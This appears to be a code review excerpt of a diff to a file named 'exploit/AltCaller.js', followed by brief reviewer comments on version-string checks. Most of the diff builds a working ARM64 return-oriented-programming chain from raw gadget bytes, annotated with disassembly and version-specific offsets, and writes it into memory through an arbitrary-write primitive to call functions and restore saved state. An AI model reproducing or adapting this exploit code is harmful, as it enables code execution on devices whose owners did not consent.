exploit/AltCaller.js

```diff
@@ -2,414 +2,443 @@
+              /*
+                LDP             X29, X30, [SP,#0x10]
+                LDP             X20, X19, [SP],#0x20
+                RET
+              */
+            ];
+        }
+
+        var storeX0toX20;
+        if (this.chainVersion !== '1.0.0') {
+            storeX0toX20 = [253, 123, 65, 169, 128, 2, 0, 249, 244, 79, 194, 168, 192, 3, 95, 214];
+        } else {
+            storeX0toX20 = [128, 2, 0, 249, 253, 123, 65, 169, 244, 79, 194, 168, 192, 3, 95, 214];
+        }
+
+        stack = stack.concat([
+            pointerHolder, // X20 (location to store X0 to)
+            0, // X19
+            0, // X29
+            sc.gadget(storeX0toX20, true), // X30
+
+            // store the return value (X0) to X20 (saved context's X0)
+            /*
+              F10610                 LDP             X29, X30, [SP,#0x10]
+              F10614                 STR             X0, [X20]
+              F10618                 LDP             X20, X19, [SP],#0x20
+              F1061C                 RET
+            */
+            utils.add2(savedContext, 0x100), // X20
+            stackrestorefunc, // X19 (value to store: LDP X29, X30, [SP],#0x10 ; RET)
+
+            0, // X29
+            sc.gadget([253, 123, 65, 169, 224, 3, 19, 170, 243, 7, 66, 248, 192, 3, 95, 214]), // X30
+
+            /*
+              F1DC34                 LDP             X29, X30, [SP,#0x10]
+              F1DC38                 MOV             X0, X19
+              F1DC3C                 LDR             X19, [SP],#0x20
+              F1DC40                 RET
+            */
+
+            0, // X19
+            0, // pad
+            0, // X29
+            sc.gadget(storeX0toX20, true), // X30
+
+            /*
+              F10610                 LDP             X29, X30, [SP,#0x10]
+              F10614                 STR             X0, [X20]
+              F10618                 LDP             X20, X19, [SP],#0x20
+              F1061C                 RET
+            */
+            0, // X20
+            savedContext, // X19
+            0, // X29
+            sc.gadget([253, 123, 65, 169, 224, 3, 19, 170, 243, 7, 66, 248, 192, 3, 95, 214]), // X30
+
+            /*
+              F1DC34                 LDP             X29, X30, [SP,#0x10]
+              F1DC38                 MOV             X0, X19
+              F1DC3C                 LDR             X19, [SP],#0x20
+              F1DC40                 RET
+            */
+            0, // X19
+            0, // pad
+            0, // X29
+            loadgadg // X30
+            // longjmp (load state)
+        ]);
+
+        for (var i = 0; i < stack.length; i++) {
+            if (stack[i] !== 0) {
+                sc.write8(stack[i], this.stackArgsPointer, (i * 8) >> 2);
+            }
+        }
+
+        /* Adjust for .scrollLeft() change. */
+        if (this.chainVersion == '6.0.0') {
```

Comment:
I'd feel better about this if it were a `>=`, but that's hard to do reliably with these strings.

Reply:
Right. It would be great if we could just have a version field accessible from anywhere in the code (maybe in utils?)

Reply:
That's a good place for it.